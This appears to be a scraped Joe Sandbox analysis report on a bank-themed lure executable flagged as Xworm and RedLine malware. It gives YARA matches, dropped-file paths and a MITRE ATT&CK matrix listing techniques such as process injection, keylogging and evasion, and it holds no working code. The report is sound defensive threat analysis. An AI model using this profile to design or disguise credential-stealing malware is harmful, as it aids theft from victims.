Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00476283
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00476747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	3 Native API	111 Scripting	1 Exploitation for Privilege Escalation	111 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Service Execution	1 LSASS Driver	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	1 DLL Side-Loading	1 LSASS Driver	1 Abuse Elevation Control Mechanism	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Valid Accounts	1 DLL Side-Loading	3 Obfuscated Files or Information	NTDS	137 System Information Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Windows Service	2 Valid Accounts	1 Direct Volume Access	LSA Secrets	241 Security Software Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	21 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Software Packing	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Windows Service	1 Timestomp	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	212 Process Injection	1 DLL Side-Loading	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	21 Registry Run Keys / Startup Folder	222 Masquerading	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	2 Valid Accounts	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	31 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	21 Access Token Manipulation	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	212 Process Injection	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: RedLine

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Ziraat_Bankasi_Swift-Messaji_Notifications.exe